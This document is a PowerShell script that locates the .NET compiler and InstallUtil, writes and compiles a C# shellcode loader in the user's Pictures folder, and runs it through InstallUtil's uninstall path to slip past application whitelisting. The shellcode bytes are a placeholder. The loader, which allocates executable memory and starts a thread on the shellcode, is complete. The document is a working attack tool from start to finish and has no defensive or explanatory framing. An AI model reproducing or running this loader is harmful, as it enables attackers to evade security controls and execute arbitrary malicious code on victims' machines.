$registry = Get-ChildItem "hklm:\software\microsoft\net framework Setup\" -Recurse;

$cscExePaths = @();
$installUtilPaths = @();

foreach ($a in $registry){

    try {

        $a.Property | ForEach-Object {
        
                if ( $a.GetValue($_) -like "*Windows\Microsoft.NET\Framework*" ) {
                
                    $holder1 = $a.GetValue($_); $holder1 += "csc.exe"; $holder1 = $holder1.Trim();
                    $holder2 = $a.GetValue($_); $holder2 += "InstallUtil.exe"; $holder2 = $holder2.Trim();
                    
                                 
                    if ( Test-path($holder1) ) { if ( $cscExePaths -notcontains $holder1 ) { $cscExePaths += $holder1; } }
                    
                    if ( Test-path($holder2) ) { if ( $installUtilPaths -notcontains $holder2 ) { $installUtilPaths += $holder2; } }
                    
                }
        };
    
    }
    catch {}

};


if ( Test-Path("$env:userprofile\pictures\program.cs") ) { Remove-Item "$env:userprofile\pictures\program.cs" }
if ( Test-Path("$env:userprofile\pictures\program.exe") ) { Remove-Item "$env:userprofile\pictures\program.exe" }

write-output 'using System; using System.Net; using System.Diagnostics; using System.Reflection; using System.Configuration.Install; using System.Runtime.InteropServices;' | Out-File "$env:userprofile\pictures\program.cs" -append ;
write-output 'public class Program { public static void Main() { Console.WriteLine(""); } }' | Out-File "$env:userprofile\pictures\program.cs" -append ;
write-output '[System.ComponentModel.RunInstaller(true)] public class Sample : System.Configuration.Install.Installer { public override void Uninstall(System.Collections.IDictionary savedState) { Shellcode.Exec(); } }' | Out-File "$env:userprofile\pictures\program.cs" -append ;
write-output 'public class Shellcode { public static void Exec() {' | Out-File "$env:userprofile\pictures\program.cs" -append ;
write-output 'byte[] shellcode = new byte[] { #CSHARP SHELLCODE HERE };' | Out-File "$env:userprofile\pictures\program.cs" -append ;
write-output 'UInt32 funcAddr = VirtualAlloc(0, (UInt32)shellcode .Length, MEM_COMMIT, PAGE_EXECUTE_READWRITE); Marshal.Copy(shellcode , 0, (IntPtr)(funcAddr), shellcode .Length); IntPtr hThread = IntPtr.Zero; UInt32 threadId = 0;' | Out-File "$env:userprofile\pictures\program.cs" -append ;
write-output 'IntPtr pinfo = IntPtr.Zero; hThread = CreateThread(0, 0, funcAddr, pinfo, 0, ref threadId); WaitForSingleObject(hThread, 0xFFFFFFFF); }' | Out-File "$env:userprofile\pictures\program.cs" -append ;	
write-output 'private static UInt32 MEM_COMMIT = 0x1000; private static UInt32 PAGE_EXECUTE_READWRITE = 0x40;' | Out-File "$env:userprofile\pictures\program.cs" -append ;
write-output '[DllImport("kernel32")] private static extern UInt32 VirtualAlloc(UInt32 lpStartAddr, UInt32 size, UInt32 flAllocationType, UInt32 flProtect);' | Out-File "$env:userprofile\pictures\program.cs" -append ;
write-output '[DllImport("kernel32")] private static extern bool VirtualFree(IntPtr lpAddress, UInt32 dwSize, UInt32 dwFreeType);' | Out-File "$env:userprofile\pictures\program.cs" -append ;
write-output '[DllImport("kernel32")] private static extern IntPtr CreateThread( UInt32 lpThreadAttributes, UInt32 dwStackSize, UInt32 lpStartAddress, IntPtr param, UInt32 dwCreationFlags, ref UInt32 lpThreadId);' | Out-File "$env:userprofile\pictures\program.cs" -append ;
write-output '[DllImport("kernel32")] private static extern bool CloseHandle(IntPtr handle);' | Out-File "$env:userprofile\pictures\program.cs" -append ;
write-output '[DllImport("kernel32")] private static extern UInt32 WaitForSingleObject(IntPtr hHandle, UInt32 dwMilliseconds );' | Out-File "$env:userprofile\pictures\program.cs" -append ;
write-output '[DllImport("kernel32")] private static extern IntPtr GetModuleHandle( string moduleName );' | Out-File "$env:userprofile\pictures\program.cs" -append ;
write-output '[DllImport("kernel32")] private static extern UInt32 GetProcAddress( IntPtr hModule, string procName );' | Out-File "$env:userprofile\pictures\program.cs" -append ;
write-output '[DllImport("kernel32")] private static extern UInt32 LoadLibrary( string lpFileName );' | Out-File "$env:userprofile\pictures\program.cs" -append ;
write-output '[DllImport("kernel32")] private static extern UInt32 GetLastError(); }' | Out-File "$env:userprofile\pictures\program.cs" -append ;

if ($cscExePaths.Length -ge 1){
    $cmd = $cscExePaths[0] +" /unsafe /platform:x86 /out:$env:userprofile\pictures\program.exe $env:userprofile\pictures\program.cs"; 
    Invoke-Expression -Command:$cmd;
}
else { exit; }

if ( Test-Path("$env:userprofile\pictures\program.exe") ){

    if ( $installUtilPaths.Length -ge 1 ) { 
        $cmd = $installUtilPaths[0] + " /logfile= /LogToConsole=False /U $env:userprofile\pictures\program.exe";
        Invoke-Expression -Command:$cmd;
    }
    else { exit; }
}
else { exit; }